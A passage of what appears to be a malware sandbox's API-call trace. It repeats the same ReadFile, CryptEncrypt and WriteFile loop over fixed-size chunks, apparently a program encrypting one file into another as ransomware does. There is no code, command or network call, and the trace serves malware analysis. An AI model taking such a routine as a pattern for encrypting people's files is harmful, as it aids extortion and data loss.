pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.502] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.503] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.503] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.503] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.503] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.503] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.503] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.503] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.503] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.503] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.503] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.503] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.503] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.504] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.504] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.504] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.504] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.504] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.504] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.504] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.504] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.504] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.504] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.504] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.504] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.504] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.505] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.505] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.505] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.505] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.505] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.505] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.505] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.505] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.505] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.505] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.505] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.505] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.506] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.506] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.506] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.506] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.506] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.506] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.506] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.506] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.506] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.507] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.507] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.507] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.507] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.507] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.507] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.507] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.507] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.507] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.507] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.507] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.508] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.508] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.508] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.508] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.508] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.508] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.508] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.508] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.508] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.508] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.508] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.508] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.508] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.509] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.509] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.509] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.509] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.509] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.509] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.509] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.509] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.509] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.509] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.509] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.509] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.509] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.509] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.510] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.510] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.510] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.510] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.510] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.510] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.510] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.510] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.510] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.510] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.510] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.510] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: 